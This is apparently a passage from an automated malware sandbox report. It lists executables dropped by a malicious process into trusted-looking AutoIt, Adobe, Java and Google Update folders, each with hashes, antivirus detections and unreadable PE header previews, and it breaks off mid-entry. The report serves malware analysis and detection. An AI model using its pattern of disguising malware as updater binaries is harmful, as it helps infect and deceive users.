                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@......Zx.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.1666764388587305
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:D+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS4Dmg27RnWGj:BSktbpKD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:B14D969182F37785DD3DA8BBE5C4BBB2
                                                                                                                                                                                                                                                                                                                                                    SHA1:0D92322782A2F12FB4A045978456D8F160E9AC97
                                                                                                                                                                                                                                                                                                                                                    SHA-256:1E4DCAFB2FE18A96D560376661751BDDB7F5B5B3234AEBA13604BDB9E3E71139
                                                                                                                                                                                                                                                                                                                                                    SHA-512:8FB79C43F578F5572366B781F9AD3D83545C51C5142F7F41296CDC9E42E37712BAA1104DF8C6291D590CD2D3131DA8BB04B404E26A9EEF31250D765C06B70176
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................J.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.094629348201209
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:49152:pGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLTDmg27RnWGj:94OEtwiICvYMRfzD527BWG
                                                                                                                                                                                                                                                                                                                                                    MD5:C8BBE9C500A2AC4CE28AAD8C47479357
                                                                                                                                                                                                                                                                                                                                                    SHA1:7645E76959C42B2A44BA0DA9791957C87B17A491
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E39B2F876674F93EC2185F49589D185143760035E2FC64FFA9778F9687C1F55A
                                                                                                                                                                                                                                                                                                                                                    SHA-512:F13EE108E648BBCBABBD3E0EAEEB2BA6657C012E8649EF0A68910E176859678C3B4C024D63BF5B8FC47858CAA9CC60F9FE3D00A8E7E4155FF470ACFC6BD14908
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....9.-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.496395069430254
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:nAMuR+3kMbVjh0sqjnhMgeiCl7G0nehbGZpbD:AD+lbVjhQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:982948B9C93B67785D34AD3B07EE784D
                                                                                                                                                                                                                                                                                                                                                    SHA1:3DD7D2D66956FB873E9093A2EBF8E09D315BF0AE
                                                                                                                                                                                                                                                                                                                                                    SHA-256:814ECACDFF689B4AAA5E7D12BF1F0511E2346445DE40FF0FDA3CDD380229B7AE
                                                                                                                                                                                                                                                                                                                                                    SHA-512:5C6A76C50655AD3EB0170477E29FA060BED2BB9C7DEB28FA74E5C9D3ECD1E1AB5E49461CAE2C3D0A6E4316225AB0353E6669575EB31FF6EA342820489E729719
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..................................0.......................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.277732219235477
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:mImGUcsvZZdubv7hfl3HXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlXsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:110DF16BED4BDADFF4170610718DE9AE
                                                                                                                                                                                                                                                                                                                                                    SHA1:10F045A39A965659AD857FB9748A50EEF732EBA4
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F72455275ADDC5EA08C757797384309A26BEAB911FFD22C3FCD51515096C25CD
                                                                                                                                                                                                                                                                                                                                                    SHA-512:77C76A1621D126FE32E04292871E0690A6CF3A7F614F0F22D44A4E629340E134258489D2CBFCD29CAC4BBAB69266312FFFDA715C1C2DE97E6F338E7EBE92AF69
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1644544
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.694810873385791
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:80vHyeLj8trn3wsWsqjnhMgeiCl7G0nehbGZpbD:ttj4rgsaDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:7B2C922C022404C1B934FC49F8DAF8D9
                                                                                                                                                                                                                                                                                                                                                    SHA1:7FCCF7B770EECAA4036298E263FF498762DD1948
                                                                                                                                                                                                                                                                                                                                                    SHA-256:9693251C09534103A7CDAAEC35693378812E96CF9CBA28D9FCA05D1A217D288C
                                                                                                                                                                                                                                                                                                                                                    SHA-512:CA21B62FC1F81436D09D55D7C63BAFF6454E010841246053EA841D22402C22AABD845AF28D54DBAE4E4E42657262F3C63A5E2936258806294AABCFFB25BAFDD0
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`......,.......................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.279680201930567
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:WoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/Z/sqjnhMgeiCl7G0nehbGZpv:D4i0wGJra0uAUfkVy7/ZjDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:63C14E9D4BE618E858AFDC572739F79B
                                                                                                                                                                                                                                                                                                                                                    SHA1:E34D814CC0160AADDF697D47107DF4A5FC8115CF
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F7B4357C60863DD37DBBBCC5290B76146AED1929E383166E65D992D3460661EF
                                                                                                                                                                                                                                                                                                                                                    SHA-512:D46D05CDE4321E95BD9CA7DB4340877C45B33DAB94D1F7EA964AA025B25EDCF6B2EF7F8754CB8E0AE373DA557D93792E0B463B2902F660068219F1F63C898219
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................q-..........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.4487895034278075
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:reR0gB6axoCf0R6RLQRF/TzJqe58BimcsqjnhMgeiCl7G0nehbGZpbD:lgHxmR6uBTzge5MimIDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:662EBACD61161FB62CF8E54AFB604CC4
                                                                                                                                                                                                                                                                                                                                                    SHA1:2580FDD05E7D16E7F816B47D7A8B6C04DAD3B869
                                                                                                                                                                                                                                                                                                                                                    SHA-256:8A87F384B258971EB7DBD82022EE941DF22A008BF18D5482370A9255365EBEA0
                                                                                                                                                                                                                                                                                                                                                    SHA-512:90C6AC7CAC7C8FCAA180621804476B6AA8478CE6A081F509B1C81FB224EE989BDF0DD0C0ED7C9433BE1DACCBBBBD6A3D9390D9F540D96C5F4BC78835E1B7CA39
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446064672330864
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:JnEbH0j4x7R6SvyCMmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:JkwOtO7msqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                    MD5:9FF67394FAE7FBE1B241D95BCEF303E1
                                                                                                                                                                                                                                                                                                                                                    SHA1:74CEBB1883AAF225EF583DB690F254E5812AE680
                                                                                                                                                                                                                                                                                                                                                    SHA-256:6AD93FC6F8E4D28F562B4F299C31A6D6AFF6E073C63C1D91BF41D2817088BD8F
                                                                                                                                                                                                                                                                                                                                                    SHA-512:18C38FA0AA2702CD93E44B4EE32E408C15ACF35316388D078F8561586AE469E742D659628019E218CC15C50BD434214555E6D026DF7E4C725F6516D7B585D097
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.446820095839598
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:anU/h/4KJsqjnhMgeiCl7G0nehbGZpbD:aU/VNDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:949E69748A45C07767A39247ED30EE08
                                                                                                                                                                                                                                                                                                                                                    SHA1:BCEA70182A91CC93E98654C1C33E2A3B03B2EE89
                                                                                                                                                                                                                                                                                                                                                    SHA-256:4ACFE725BA62E194B6467DB0EB0AFAD915C1D54F9B13F607B665D7693F8A904B
                                                                                                                                                                                                                                                                                                                                                    SHA-512:C7808989BF9F175C79ABA31A03B6E454933014A32A3EB0A4A570EE8534CF5B3760574DDE3A531D39D4B37E01A1C9265E2EC774753A6A97319D6C9884EEE80922
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......O........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4837394867857165
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:Cx71iBLZ05jNTmJWExKsqjnhMgeiCl7G0nehbGZpbD:CxhiHIjNgeDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:857B0BC9288D3EB9973CA651CE5F2348
                                                                                                                                                                                                                                                                                                                                                    SHA1:49CACEE35725A47D876B0940A7D427C2BF382B17
                                                                                                                                                                                                                                                                                                                                                    SHA-256:F217F3DB0A03E365319643656FB518279B5A9E30CC1035B37A638A972061EE73
                                                                                                                                                                                                                                                                                                                                                    SHA-512:9D18E68A08D2D890ABE1E3597F3D8FC722332F2DE3EACEF42AD5E506FE1C568542D29FB91AA9BA632EC2AE9DB8AC9AA3834E2FCA8D8AAA05ECBEC5E9FF411789
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1419264
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.46670460567732
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:1lnRklQ6fgJcEwix0sqjnhMgeiCl7G0nehbGZpbD:ZoRfgJcEwCQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:FFC4340D0A214C8FAFFD6A8841CAF1FF
                                                                                                                                                                                                                                                                                                                                                    SHA1:4E91F562E2CB2F1EFFE0FD2E9AF1DEC1D0796CD0
                                                                                                                                                                                                                                                                                                                                                    SHA-256:E4B42B1B9AFF666B31F94D7BE16E790E359F0570F6823D898E14497394CF40F3
                                                                                                                                                                                                                                                                                                                                                    SHA-512:26228E339A891B7DF18EB0AFC7C51D8D67E5CE32903875CE25A711A861ECAA4F6390661BA087340A79A19A1C9666962E634F196D3193A42D2428ADA56D615E1C
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@................................../......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.496524999393751
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:iW25k8hb0Haw+xksqjnhMgeiCl7G0nehbGZpbD:iWyk8SHawmADmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                    MD5:48F56F9DEACA01A4983DCE11382B2F5E
                                                                                                                                                                                                                                                                                                                                                    SHA1:23C67857FD7A77E6466E8AB6B3D0BC774B9EAFAC
                                                                                                                                                                                                                                                                                                                                                    SHA-256:04E7C20742A3722ED7495B234EFB6C74F2928B1C28425FE6D58F7A1C24A22B12
                                                                                                                                                                                                                                                                                                                                                    SHA-512:0E27684C118E33AC4CD2EADDC0A13F00D63E44FADE340B57E7A0F1AF8E50C86E1DBD048916D5D23A2F3B9A854E16CC87C1ADFB3B546888F1BA13C8C433F41276
                                                                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@.......................................... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                    C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                                                                                    Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.163944172277405
                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:NWP/aK2vB+rXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:NKCKABssqjnhMgeiCl7G0nehbGZpbD
